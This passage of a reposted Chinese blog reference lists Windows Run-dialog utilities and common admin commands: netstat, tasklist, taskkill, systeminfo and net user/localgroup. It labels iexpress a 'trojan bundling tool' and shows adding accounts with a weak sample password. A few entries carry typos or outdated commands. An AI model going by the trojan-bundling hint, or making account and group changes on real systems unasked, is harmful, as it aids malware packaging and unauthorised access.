VERIFY 告诉 Windows 是否进行验证,以确保文件正确写入磁盘。
VOL 显示磁盘卷标和序列号。
XCOPY 复制文件和目录树。
WMIC 在交互式命令 shell 中显示 WMI 信息。

 

附件二:DOS外部命令(开始→运行)

1. calc-----------启动计算器

2. certmgr.msc----证书管理实用程序

3. charmap--------启动字符映射表

4. chkdsk.exe-----Chkdsk磁盘检查

5. ciadv.msc------索引服务程序

6. cleanmgr-------垃圾整理

7. cliconfg-------SQL SERVER 客户端网络实用程序

8. Clipbrd--------剪贴板查看器

9. cmd.exe--------CMD命令提示符

10. compmgmt.msc---计算机管理

11. conf-----------启动netmeeting

12. dcomcnfg-------打开系统组件服务

13. ddeshare-------打开DDE共享设置

14. devmgmt.msc--- 设备管理器

15. dfrg.msc-------磁盘碎片整理程序

16. diskmgmt.msc---磁盘管理实用程序

17. drwtsn32------ 系统医生

18. dvdplay--------DVD播放器

19. dxdiag---------检查DirectX信息

20. eudcedit-------造字程序

21. eventvwr-------事件查看器

22. explorer-------打开资源管理器

23. fsmgmt.msc-----共享文件夹管理器

24. gpedit.msc-----组策略

25. iexpress-------木马捆绑工具,系统自带

26. logoff---------注销命令

27. lusrmgr.msc----本机用户和组

28. magnify--------放大镜实用程序

29. mem.exe--------显示内存使用情况

30. mmc------------打开控制台

31. mobsync--------同步命令

32. mplayer2-------简易widnows media player

33. Msconfig.exe---系统配置实用程序

34. mspaint--------画图板

35. mstsc----------远程桌面连接

36. narrator-------屏幕“讲述人”

37. net start messenger----开始信使服务

38. net stop messenger-----停止信使服务

39. netstat -an----(TC)命令检查接口

40. notepad--------打开记事本

41. Nslookup-------IP地址侦测器

42. ntbackup-------系统备份和还原

43. ntmsmgr.msc----移动存储管理器

44. ntmsoprq.msc---移动存储管理员操作请求

45. odbcad32-------ODBC数据源管理器

46. oobe/msoobe /a----检查XP是否激活

47. osk------------打开屏幕键盘

48. packager-------对象包装程序

49. perfmon.msc----计算机性能监测程序

50. progman--------程序管理器

51. regedit.exe----注册表

52. regedt32-------注册表编辑器

53. regsvr32 /u *.dll----停止dll文件运行

54. regsvr32 /u zipfldr.dll------取消ZIP支持

55. rononce -p ----15秒关机

56. rsop.msc-------组策略结果集

57. secpol.msc-----本地安全策略

58. services.msc---本地服务设置

59. sfc /scannow---windows文件保护

60. sfc.exe--------系统文件检查器

61. shrpubw--------创建共享文件夹

62. sigverif-------文件签名验证程序

63. sndrec32-------录音机

64. Sndvol32-------音量控制程序

65. syncapp--------创建一个公文包

66. sysedit--------系统配置编辑器

67. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 (慎用)

68. taskmgr--------任务管理器

69. tourstart------xp简介(安装完成后出现的漫游xp程序)

70. tsshutdn-------60秒倒计时关机命令

71. utilman--------辅助工具管理器

72. wiaacmgr-------扫描仪和照相机向导

73. winchat--------XP自带局域网聊天

74. winmsd---------系统信息

75. winver---------检查Windows版本

76. wmimgmt.msc----打开windows管理体系结构(WMI)

77. write----------写字板

78. wscript--------windows脚本宿主设置

79. wupdmgr--------windows更新程序

附件三:常用运维命令

1、driverquery

驱动程序仍然是PC上安装的最重要的软件之一。配置不当或缺少驱动程序会导致各种麻烦,因此可以访问PC上的内容列表。这正是“driverquery”命令的作用。您可以将其扩展为“driverquery -v”以获取更多信息,包括安装驱动程序的目录。

2、Ipconfig

此命令会显示你计算机当前使用的IP地址。但是,如果您在路由器后面(如今大多数计算机),您将收到路由器的本地网络地址。而且,ipconfig的扩展功能很有用。“ipconfig / release”和“ipconfig / renew”可以强制你的Windows PC请求新的IP地址,如果您的计算机声称其中一个不可用,这将非常有用。您还可以使用“ipconfig / flushdns”刷新DNS地址。如果Windows网络故障排除程序不好用,这些命令就很棒,有时有奇效。

3、netstat

输入命令“netstat -an”将为您提供当前打开的端口和相关IP地址的列表。此命令还将告诉您端口所处的状态 - 侦听,建立或关闭。当您尝试对连接到PC的设备进行故障排除,或者当您担心特洛伊木马程序感染了您的系统而您正试图找到恶意连接时,这是一个很棒的命令。

4、Ping

有时,您需要知道数据包是否正在将其发送到特定的联网设备。这就是ping派上用场的地方。

键入“ping”后跟IP地址或Web域将向指定地址发送一系列测试数据包。如果他们到达并返回,您知道该设备能够与您的PC通信; 如果它失败了,你知道设备和你的计算机之间存在阻塞通信的东西。这可以帮助您确定问题的根源是不正确的配置还是网络硬件的故障。

5、PathPing

这是一个更高级的ping版本,如果您的PC和您正在测试的设备之间有多个路由器,这将非常有用。与ping一样,您可以通过键入“pathping”后跟IP地址来使用此命令,但与ping不同,路径还会转发有关测试数据包所采用路由的一些信息。

6、shutdown

关闭计算机。

当然,这对于已经很容易访问的关机按钮来说是多余的,但是没有多余的是“shutdown / r / o”命令,它会重启你的电脑并启动高级启动选项菜单,你可以在这里访问安全模式和Windows恢复实用程序。如果要重新启动计算机以进行故障排除,这非常有用。

另外还可以用于实现定时关机"shutdown-s -t 1024",表示1024秒后自动关机。

7、systeminfo

此命令将为您提供计算机的详细配置概述。该列表涵盖了您的操作系统和硬件。例如,您可以查找原始Windows安装日期,上次启动时间,BIOS版本,总内存和可用内存,已安装的修补程序,网卡配置等。

使用“systeminfo / s”后跟本地网络上计算机的主机名,远程获取该系统的信息。这可能需要域,用户名和密码的其他语法元素,如下所示:“systeminfo / s [host_name] / u [domain] [user_name] / p [user_password]”

8、sfc

System File Checker是一种自动扫描和修复工具,专注于Windows系统文件。

您需要以管理员权限运行命令提示符并输入命令“sfc / scannow”。如果SFC发现任何损坏或丢失的文件,它将自动使用Windows为此目的保留的备份副本替换它们。该命令可能需要半小时才能在较旧的笔记本电脑上运行。

9、tasklist

您可以使用“tasklist”命令提供PC上运行的所有任务的最新列表。虽然在任务管理器中有些多余,但命令有时可能会在该实用程序中查找隐藏在视图中的任务。

还有各种各样的修饰符。“Tasklist -svc”显示与每个任务相关的服务,使用“tasklist -v”获取每个任务的更多细节,“tasklist -m”将定位与活动任务相关的.dll文件。这些命令对高级故障排除很有用。

10、taskkill

出现在“tasklist”命令中的任务将具有与之关联的可执行文件和进程ID(四位或五位数字)。您可以使用“taskkill -im”后跟可执行文件的名称或“taskkill -pid”后跟进程ID强制停止程序。同样,这对于任务管理器来说有点多余,但您可以使用它来杀死其他无响应或隐藏的程序。

11、net

net user 查询本机用户账户

net user Administrator 查询用户具体信息

net user abc 123456 /add 添加用户abc,密码123456

net user abc /del 删除用户abc

net user abc /times:M-W,8:00-12:00 设置用户访问时间(Monday:周一,Tuesday:周二,Wednesday:周三,Thursday:周四,Friday:周五,Saturday:周六,Sunday:周日)

net user abc /expires:2020/1/1 设置用户到期时间(也可以为expires:never)

net user abc /name:cba :abc改名为cba

net localgroup:查询本地用户权限的分组

net localgroup [groupname] /add(del):创建(删除)组

net localgroup [groupname] [username] /add:将用户加入权限组

net localgroup [groupname] [username] /del:将用户删除权限组
————————————————
版权声明:本文为CSDN博主「冰清-小魔鱼」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/lijie45655/article/details/81806212

posted @ 2021-09-13 13:50  信铁寒胜  阅读(1374)  评论(0编辑  收藏  举报